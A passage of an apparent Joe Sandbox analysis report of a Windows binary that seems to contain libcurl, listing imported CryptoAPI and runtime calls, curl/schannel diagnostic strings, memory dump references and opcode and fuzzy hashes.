                                        • CertAddCertificateContextToStore.CRYPT32(?,?,00000004,00000000), ref: 0010ED23
                                        • CertFreeCertificateContext.CRYPT32(?), ref: 0010ED31
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0010ED54
                                        Strings
                                        • -----BEGIN CERTIFICATE-----, xrefs: 0010EC65
                                        • schannel: unexpected content type '%d' when extracting certificate from CA file '%s', xrefs: 0010ED78
                                        • schannel: did not add any certificates from CA file '%s', xrefs: 0010EDCF
                                        • -----END CERTIFICATE-----, xrefs: 0010EC96
                                        • schannel: failed to add certificate from CA file '%s' to certificate store: %s, xrefs: 0010ED6A
                                        • schannel: CA file '%s' is not correctly formatted, xrefs: 0010EDAC
                                        • schannel: failed to extract certificate from CA file '%s': %s, xrefs: 0010ED96
                                        • schannel: added %d certificate(s) from CA file '%s', xrefs: 0010EDE5
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: CertCertificateContext$CryptErrorFreeLastObjectQueryStore
                                        • String ID: -----END CERTIFICATE-----$-----BEGIN CERTIFICATE-----$schannel: CA file '%s' is not correctly formatted$schannel: added %d certificate(s) from CA file '%s'$schannel: did not add any certificates from CA file '%s'$schannel: failed to add certificate from CA file '%s' to certificate store: %s$schannel: failed to extract certificate from CA file '%s': %s$schannel: unexpected content type '%d' when extracting certificate from CA file '%s'
                                        • API String ID: 854292303-665156428
                                        • Opcode ID: 19c83eb63d6f7f9e53848c4f14786106108d17280add3ba8e853939eeed7b8be
                                        • Instruction ID: 5c7bb0b7339ed877f27e9cbb2344b3503c5439c9e5c650af44ee795360fa5d33
                                        • Opcode Fuzzy Hash: 19c83eb63d6f7f9e53848c4f14786106108d17280add3ba8e853939eeed7b8be
                                        • Instruction Fuzzy Hash: 9251B671E0022CABDB299F55DC46FEDB7B5EB48710F0045DAF549A6281DBB04E918F90
                                        APIs
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,74F81980,00000001), ref: 000D461F
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000D462A
                                        • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 000D463A
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000D4645
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000D4650
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000D465D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _errno$strtol
                                        • String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$GMT
                                        • API String ID: 3596500743-988243589
                                        • Opcode ID: cbfc1e3fa45dc1c0c23844fbcc274ddc7b43d8af77e3544b711a52404730c3fe
                                        • Instruction ID: 784fa7cfd79f1dc666b5e3b29f8fa7bea7d942e293284b5aa8ac628642b4989a
                                        • Opcode Fuzzy Hash: cbfc1e3fa45dc1c0c23844fbcc274ddc7b43d8af77e3544b711a52404730c3fe
                                        • Instruction Fuzzy Hash: CAD15D71E047189FCF64DFB8D8846EDBBF6AB4A320F24422BE425E7395D73099418B60
                                        APIs
                                          • Part of subcall function 000D0B38: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,RtlVerifyVersionInfo), ref: 000D0B6D
                                          • Part of subcall function 000D0B38: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 000D0B74
                                        • CertGetNameStringA.CRYPT32(?,00000006,00010002,00000000,?,000001B8), ref: 0010F073
                                        Strings
                                        • schannel: Empty DNS name., xrefs: 0010F13E
                                        • schannel: Null certificate info., xrefs: 0010F0BC
                                        • schannel: CryptDecodeObjectEx() returned no alternate name information., xrefs: 0010F111
                                        • schannel: Null certificate context., xrefs: 0010F0A3
                                        • schannel: CertFindExtension() returned no extension., xrefs: 0010F0D8
                                        • 2.5.29.17, xrefs: 0010F0C9, 0010F0FD
                                        • schannel: Not enough memory to list all host names., xrefs: 0010F1C3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: AddressCertHandleModuleNameProcString
                                        • String ID: 2.5.29.17$schannel: CertFindExtension() returned no extension.$schannel: CryptDecodeObjectEx() returned no alternate name information.$schannel: Empty DNS name.$schannel: Not enough memory to list all host names.$schannel: Null certificate context.$schannel: Null certificate info.
                                        • API String ID: 4138448956-2160583098
                                        • Opcode ID: 6f756fbe0d475cefdf2571d78920c1a80f7b08f5f5761bd097077f4051d4b11c
                                        • Instruction ID: bfe50978bbb6c815b883797b414432e5e488ae89dec8d9b5fd3136ae038f6018
                                        • Opcode Fuzzy Hash: 6f756fbe0d475cefdf2571d78920c1a80f7b08f5f5761bd097077f4051d4b11c
                                        • Instruction Fuzzy Hash: 06519431A00205EFCB25DF64DC42AAEBBF5EF48714F14C16EE545EB686E7B09942CB90
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                                        • API String ID: 3732870572-2102732564
                                        • Opcode ID: 35d37c5448af0b7153d78018f3240e87b79f6883f1113dd3c83959d112f7de6f
                                        • Instruction ID: d9a0efd48118e8d60718192659bcd2ccae835e88a0c7e34038b3ef776810a0f9
                                        • Opcode Fuzzy Hash: 35d37c5448af0b7153d78018f3240e87b79f6883f1113dd3c83959d112f7de6f
                                        • Instruction Fuzzy Hash: 0631B173E416E535E938170AEC4AFAF580E8796B24B1A063EFC19B318395B1586090F2
                                        Strings
                                        • Server doesn't support multiplex (yet), xrefs: 000E26D2
                                        • Found pending candidate for reuse and CURLOPT_PIPEWAIT is set, xrefs: 000E2E09
                                        • Multiplexed connection found, xrefs: 000E2DD7
                                        • Can not multiplex, even if we wanted to, xrefs: 000E2712
                                        • Server doesn't support multiplex yet, wait, xrefs: 000E26A6
                                        • Could multiplex, but not asked to, xrefs: 000E26FA
                                        • Connection #%ld is still name resolving, can't reuse, xrefs: 000E27B4
                                        • can multiplex, xrefs: 000E2675, 000E267D
                                        • Connection #%ld isn't open enough, can't reuse, xrefs: 000E27D4
                                        • serially, xrefs: 000E2670
                                        • Found bundle for host: %p [%s], xrefs: 000E267F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Can not multiplex, even if we wanted to$Connection #%ld is still name resolving, can't reuse$Connection #%ld isn't open enough, can't reuse$Could multiplex, but not asked to$Found bundle for host: %p [%s]$Found pending candidate for reuse and CURLOPT_PIPEWAIT is set$Multiplexed connection found$Server doesn't support multiplex (yet)$Server doesn't support multiplex yet, wait$can multiplex$serially
                                        • API String ID: 0-1297456373
                                        • Opcode ID: 756cadd374506fc139bdb7e363ef8da14c203d22079d172d18e8d037cd71d77d
                                        • Instruction ID: a33a857d362d18074179ae1781c2c2dd40a59c8545e4e8e76c3f408e8b57debc
                                        • Opcode Fuzzy Hash: 756cadd374506fc139bdb7e363ef8da14c203d22079d172d18e8d037cd71d77d
                                        • Instruction Fuzzy Hash: F132B130A08BC18FDFB6CB3685957FA7BEA6F52304F1C84A9C8D56B252D721AC85C711
                                        APIs
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F84DB
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F854E
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F8580
                                        • bind.WS2_32(?,00000030,?), ref: 000F85FC
                                        • WSAGetLastError.WS2_32 ref: 000F8607
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: calloc$ErrorLastbind
                                        • String ID: bind() failed; %s
                                        • API String ID: 2604820300-1141498939
                                        • Opcode ID: daaf41e9b35d228897ceaa02e4117f47f4f05389ee7ece60dda9c8d98ee92e90
                                        • Instruction ID: 71ea948a4fdfbf687f31bfd7749051c19c4bc55f0c84b660c455bc3371f82eb0
                                        • Opcode Fuzzy Hash: daaf41e9b35d228897ceaa02e4117f47f4f05389ee7ece60dda9c8d98ee92e90
                                        • Instruction Fuzzy Hash: 19519070604609DFDB28CF24D849BE8B7E0FF44710F1481AAE909DB691DBB0AD808F91
                                        APIs
                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000040), ref: 001065D2
                                        • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 001065EC
                                        • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 001065FD
                                        • CryptGetHashParam.ADVAPI32(?,00000004,?,00000004,00000000,?,?,00000000), ref: 00106616
                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,?,00000000), ref: 00106633
                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00106642
                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00106653
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                                        • String ID:
                                        • API String ID: 3606780921-0
                                        • Opcode ID: acaac6512a7262268ed1ee025954450f218ed0da67ac9a4ec9c34d7bc985b645
                                        • Instruction ID: af54297d4700f5ced7f9fe06d6b89323ef845d5c29ec459b4c342da0074602b4
                                        • Opcode Fuzzy Hash: acaac6512a7262268ed1ee025954450f218ed0da67ac9a4ec9c34d7bc985b645
                                        • Instruction Fuzzy Hash: 9621E971A40208FBEB209F94DD4AFDEBBB9EB48740F108065B604F60E0D7B19A54DBA4
                                        APIs
                                        • CryptGetHashParam.ADVAPI32(?,00000002,00000000,00000000,00000000,?,00000000,?,?,0010F8EB,?,?,?,?,00109C33,00000000), ref: 0010F879
                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,00000020,00000000,?,?,0010F8EB,?,?,?,?,00109C33,00000000,?), ref: 0010F892
                                        • CryptDestroyHash.ADVAPI32(?,?,?,0010F8EB,?,?,?,?,00109C33,00000000,?), ref: 0010F8A0
                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,0010F8EB,?,?,?,?,00109C33,00000000,?), ref: 0010F8AD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: Crypt$Hash$Param$ContextDestroyRelease
                                        • String ID:
                                        • API String ID: 2110207923-3916222277
                                        • Opcode ID: 04b14245f38b4746b3eddebb8276ddac9791028e6c019874530e33f4f7c19e03
                                        • Instruction ID: 971691c3af297365410f3524c0c6d9aca79aeb3a23842ffc31267fddbad5d96e
                                        • Opcode Fuzzy Hash: 04b14245f38b4746b3eddebb8276ddac9791028e6c019874530e33f4f7c19e03
                                        • Instruction Fuzzy Hash: 31F04935400608FFDB318F81DE0ADDABBBAEBC5B01B508029F585A2860D3719E80EB90
                                        APIs
                                        • CreateToolhelp32Snapshot.API-MS-WIN-CORE-TOOLHELP-L1-1-0(00000008,00000000), ref: 000C3148
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000C3155
                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 000C316F
                                        • Module32First.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-2(00000000,00000224), ref: 000C318D
                                        • Module32Next.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-2(00000000,00000224), ref: 000C31B2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: Module32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 3822340588-0
                                        • Opcode ID: e2078b7174e8b06bfb1fb3fc9c33bd7a6e5a30c2fe1fc711e2bb7873bd5d23d4
                                        • Instruction ID: d8a2646e97e56ba06530091ed1655ab07664aad968fe58464157b85524258c3b
                                        • Opcode Fuzzy Hash: e2078b7174e8b06bfb1fb3fc9c33bd7a6e5a30c2fe1fc711e2bb7873bd5d23d4
                                        • Instruction Fuzzy Hash: DF110631600214BFD761ABB5AC4DFEE76AADB85320F084269FC15D31D0DF708EC58665
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E7864
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E78B8
                                        Strings
                                        • -----END PUBLIC KEY-----, xrefs: 000E7839
                                        • -----BEGIN PUBLIC KEY-----, xrefs: 000E7811
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: freemalloc
                                        • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----
                                        • API String ID: 3061335427-1157147699
                                        • Opcode ID: fb5e5ce8564725f377d08c0b0c630e3565ed0d47c8498df8b52b0efe2b277031
                                        • Instruction ID: 6fb02ffe782cb6d324dabc6979cb8550493b5174c2d74772933e210f981e727d
                                        • Opcode Fuzzy Hash: fb5e5ce8564725f377d08c0b0c630e3565ed0d47c8498df8b52b0efe2b277031
                                        • Instruction Fuzzy Hash: FB214B32B48255AFDB298B69E94876DBBE6EB50350F604036D448E7280DF709C40C6A1
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00111567
                                        • IsDebuggerPresent.KERNEL32 ref: 00111633
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00111653
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0011165D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                        • String ID:
                                        • API String ID: 254469556-0
                                        • Opcode ID: d9d830d40c799f2f1d340e38f31dc7d946a1d0ead44049839d1e9a8f7ed135d2
                                        • Instruction ID: def865267ac481e0e0397b7d8ab5b13b4844350a7af5696b23c5c55063442b99
                                        • Opcode Fuzzy Hash: d9d830d40c799f2f1d340e38f31dc7d946a1d0ead44049839d1e9a8f7ed135d2
                                        • Instruction Fuzzy Hash: C63116B5D05718DBDB20DFA4D989BCCBBB8AF08300F1041AAE50DAB250EB719AC5CF54
                                        APIs
                                        • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000), ref: 0010C769
                                        • CryptGetHashParam.ADVAPI32(00000010,00000002,?,00000010,00000000), ref: 0010C782
                                        • CryptDestroyHash.ADVAPI32(00000010), ref: 0010C790
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0010C79D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: Crypt$Hash$Param$ContextDestroyRelease
                                        • String ID:
                                        • API String ID: 2110207923-0
                                        • Opcode ID: 0b8efa564c7ad2773e73af284ff647941f752af4c1d8419ce01c6662fa6b23a9
                                        • Instruction ID: ab05f4f81f173bb1995db3058298c4698223b08b211e16d04805214754efef52
                                        • Opcode Fuzzy Hash: 0b8efa564c7ad2773e73af284ff647941f752af4c1d8419ce01c6662fa6b23a9
                                        • Instruction Fuzzy Hash: E7F04935400608FFDB218F85DE49C9BBBBAEBC5B01B508128F586A24A0C3719E40EF90
                                        APIs
                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040), ref: 00106417
                                        • CryptGenRandom.ADVAPI32(?,?,?), ref: 00106430
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00106445
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: Crypt$Context$AcquireRandomRelease
                                        • String ID:
                                        • API String ID: 1815803762-0
                                        • Opcode ID: 6a2d693b4177f3b5faac93daba463c6da7d4dd9db6f7990f48b01b373ffedf91
                                        • Instruction ID: 20fe1ef92fe60ca3f06b5a29f2b65bf8b6ac1db374db26f3b2ea1972efed0a21
                                        • Opcode Fuzzy Hash: 6a2d693b4177f3b5faac93daba463c6da7d4dd9db6f7990f48b01b373ffedf91
                                        • Instruction Fuzzy Hash: 1AF05E72600154FBDB308B96DD0AFDB7E79EBC8B50F118014F605E6090D7B08950E751
                                        APIs
                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000040,00000000,74F80130,?,0010C800,00000000), ref: 0010C6F4
                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000004,?,0010C800,00000000), ref: 0010C710
                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0010C800,00000000), ref: 0010C71D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: Crypt$Context$AcquireCreateHashRelease
                                        • String ID:
                                        • API String ID: 4045725610-0
                                        • Opcode ID: 20f8c5d8c2c270a033f67b63a70a32fba50ac38356f8de2c339d2a1b6a5622ae
                                        • Instruction ID: 8754077cc55693caf487b6fbe9c1243091f557179b198746938bcbbaf2cb8467
                                        • Opcode Fuzzy Hash: 20f8c5d8c2c270a033f67b63a70a32fba50ac38356f8de2c339d2a1b6a5622ae
                                        • Instruction Fuzzy Hash: F2F03035200244FAE7344B63ED0CE977F6DEBC5B90B114429F685D50A0D7A195409EA4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e71fda9ab858a68a3d86d4f2b1c101caa93887c50daf405530c610dceef86b3
                                        • Instruction ID: b1f809425ede0197c6ebb029a95f6663ecec37494d1d593a6f199e68db430512
                                        • Opcode Fuzzy Hash: 5e71fda9ab858a68a3d86d4f2b1c101caa93887c50daf405530c610dceef86b3
                                        • Instruction Fuzzy Hash: 2BD24B34A04301DFDB65CF6CC584AA83BA2AB46350F1891B7ED0A8F75AD730DA44DB76
                                        APIs
                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000040,?,?,?,0010F8CD,?,00000000,?,00000000,?,?,00109C33), ref: 0010F834
                                        • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?,?,0010F8CD,?,00000000,?,00000000,?,?,00109C33,?), ref: 0010F84B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: Crypt$AcquireContextCreateHash
                                        • String ID:
                                        • API String ID: 1914063823-0
                                        • Opcode ID: acd556c885e8d3b25b3d9b8d0e5f1c5c2f7e69dcefaeb12b55f08371248af13f
                                        • Instruction ID: b1c76fd72ad1175ad32619bef701b654b57b58d32bd7ec46209cae72a774779f
                                        • Opcode Fuzzy Hash: acd556c885e8d3b25b3d9b8d0e5f1c5c2f7e69dcefaeb12b55f08371248af13f
                                        • Instruction Fuzzy Hash: D3E0EC36240694FBE7305AA7DD0DED77FADEBC6F50B008029FA48D6450DA61E501C7B5
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00111390
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
